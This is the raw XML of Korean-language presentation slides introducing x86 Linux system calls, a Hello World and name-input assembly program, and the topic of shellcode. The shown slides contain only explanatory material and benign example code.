              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t> 유저모드로 나뉘는데</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>유저모드에서는 커널 내부의 코드를 실행할 수 없습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>만약 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>커널모드에게</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t> 어떠한 코드를 사용하겠다는 신호를 주면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>커널모드로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t> 바뀌며 사용이 가능해지는데</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>이때</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>이 신호가 바로 시스템콜 입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>로 시스템콜의 번호를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>나머지 레지스터로 인자를 전달합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>쉽게 그림으로 나타내 보면 다음과 같이 표현할 수 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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690CB0-D551-4E64-A1DE-8BADEF24094A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5653452" y="4835768"/>
            <a:ext cx="1072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</a:rPr>
              <a:t>코드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1234</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>블라블라</a:t>
            </a:r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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…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461E2C6-C928-492B-92E3-ACC03B298EFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5231422" y="4462231"/>
            <a:ext cx="3191607" cy="16265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B40AAAF-B239-46D9-A33A-D954979D16B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1855176" y="4855623"/>
            <a:ext cx="931985" cy="80889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7F6FA1-B540-4BD9-B27D-FDBCB08D1394}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1823275" y="5796420"/>
            <a:ext cx="99578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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="13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프로그램</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="13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endParaRPr lang="ko-KR" altLang="en-US" sz="13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A132AB-85AE-4FAF-8440-3BB2A2B6572E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6486426" y="6148105"/>
            <a:ext cx="68159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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="13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커널</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="13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endParaRPr lang="ko-KR" altLang="en-US" sz="13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15" name="연결선: 꺾임 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{368C1157-DC9D-446C-93B6-FD63DB764B77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="11" idx="0"/>
            <a:endCxn id="23" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4191835" y="2868665"/>
            <a:ext cx="116292" cy="3857625"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 553632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곱하기 기호 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{745A99E8-38C9-4CFB-B2AB-3EDE9C4DD577}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3993905" y="3983192"/>
            <a:ext cx="4572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F1CD267-C531-4005-A6EE-E517873B9EFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5530361" y="4739331"/>
            <a:ext cx="1296865" cy="115151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10A218-2130-4DD7-966E-5AC55EFED102}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6982559" y="4835238"/>
            <a:ext cx="1072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</a:rPr>
              <a:t>코드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5678</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>가나다라</a:t>
            </a:r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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…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D436BEF-5E2C-4D57-84BD-3F13DD783672}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6827226" y="4739331"/>
            <a:ext cx="1367205" cy="115098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D9841452-049C-4FEC-8344-E804F92C53C8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2787161" y="5260069"/>
            <a:ext cx="2444261" cy="1545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9B45EFF-D164-41E7-A219-04E162A5C49A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476788" y="5309292"/>
            <a:ext cx="7457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eax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: 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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ebx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: 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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ecx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: 0</a:t>
            </a:r>
          </a:p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…</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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49943458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System Call?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0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F51062A6-3519-4A37-962F-8C6DCE21A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97" y="1754660"/>
            <a:ext cx="7028934" cy="4927494"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" dirty="0"/>
              <a:t>시스템 콜의 번호는 아래 사이트에서 확인할 수 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://syscalls.kernelgrok.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t>Hello World </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" dirty="0"/>
              <a:t>에서 사용한 시스템 콜은</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" dirty="0"/>
              <a:t>번과</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t> 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" dirty="0"/>
              <a:t>번</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" dirty="0"/>
              <a:t>입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" dirty="0"/>
              <a:t>시스템콜을 찾아보니 각각</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0" err="1"/>
              <a:t>sys_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0" err="1"/>
              <a:t>sys_exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" dirty="0"/>
              <a:t>입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" dirty="0"/>
              <a:t>해석해보면 다음과 같이 표현할 수 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0" err="1"/>
              <a:t>sys_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0" err="1"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t>(1)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0" err="1"/>
              <a:t>helloworld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0" err="1"/>
              <a:t>helloworldlen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0" err="1"/>
              <a:t>sys_exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t>  0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" dirty="0"/>
              <a:t>즉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t>, c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300" dirty="0"/>
              <a:t>언어로 해석해보면 다음과 같습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t>write(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0" err="1"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t>, “Hello World!\n”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0" err="1"/>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t>(“Hello World!\n”));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300" dirty="0"/>
              <a:t>exit(0);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D0BF5C7D-A9FE-41CC-B7F1-8DDF5A6CBF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170" t="46384" r="25610" b="2171"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6030151" y="2505664"/>
            <a:ext cx="2269788" cy="1758463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23883CE7-25DB-4C97-BE6C-D67D2C2573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476" y="3234753"/>
            <a:ext cx="4347302" cy="337357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5332F98-E7CA-4397-9460-57C3A0243B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5475" y="3731169"/>
            <a:ext cx="4347303" cy="191959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DCEECFF7-6817-4180-8936-0343D1480FB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6896880" y="2646484"/>
            <a:ext cx="286435" cy="1758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5A61E862-7F71-4E07-8666-2EC100D84283}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6896880" y="3683975"/>
            <a:ext cx="286435" cy="1758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252100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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>name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645659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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>name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536F074-A236-43AD-9E42-E69C2F6C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62" y="1222130"/>
            <a:ext cx="2752820" cy="5078017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FC936527-B555-4AF4-93F7-3B9EF4F7B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260" y="4328921"/>
            <a:ext cx="5064369" cy="74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4969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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>name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536F074-A236-43AD-9E42-E69C2F6C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62" y="1222130"/>
            <a:ext cx="2752820" cy="5078017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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34828"/>
            <a:ext cx="3345989" cy="481104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ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>영역에 출력할 메시지를 상수로 저장한 뒤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ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>각각 길이를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>len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매크로에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>등록해놓습니다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1611463" y="1397978"/>
            <a:ext cx="2752820" cy="7121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364283" y="1600200"/>
            <a:ext cx="509123" cy="1538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4776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What is Shell Code</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0"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Introduce about Shell Code</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Shape 84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dirty="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71562213"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>name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536F074-A236-43AD-9E42-E69C2F6C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62" y="1222130"/>
            <a:ext cx="2752820" cy="5078017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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34828"/>
            <a:ext cx="3345989" cy="481104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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>초기화되지 않은 변수 영역</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 영역에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이라는 이름을 가진 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>만큼의 바이트 배열을 만듭니다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1611463" y="2171700"/>
            <a:ext cx="2752820" cy="356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</p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4364282" y="2373923"/>
            <a:ext cx="5706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210729"/>
      </p:ext>
    </p:extLst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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>name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536F074-A236-43AD-9E42-E69C2F6C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62" y="1222130"/>
            <a:ext cx="2752820" cy="5078017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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34828"/>
            <a:ext cx="3345989" cy="481104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먼저</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, “Input your name : ”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 출력해줍니다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1611463" y="3024554"/>
            <a:ext cx="2752820" cy="6770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364283" y="3363058"/>
            <a:ext cx="509124" cy="65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343414"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>name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536F074-A236-43AD-9E42-E69C2F6C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62" y="1222130"/>
            <a:ext cx="2752820" cy="5078017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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34828"/>
            <a:ext cx="3345989" cy="481104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그리고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stdin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에서 입력을 받아 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 집어넣습니다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1611463" y="3683980"/>
            <a:ext cx="2752820" cy="7121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364283" y="4040068"/>
            <a:ext cx="509123" cy="659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87026"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>name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536F074-A236-43AD-9E42-E69C2F6C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62" y="1222130"/>
            <a:ext cx="2752820" cy="5078017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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34828"/>
            <a:ext cx="3345989" cy="481104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그리고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, “Your name is : ” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 출력합니다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1611463" y="4369776"/>
            <a:ext cx="2752820" cy="7209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364283" y="4730261"/>
            <a:ext cx="576994" cy="615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801044"/>
      </p:ext>
    </p:extLst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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>name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536F074-A236-43AD-9E42-E69C2F6C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62" y="1222130"/>
            <a:ext cx="2752820" cy="5078017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
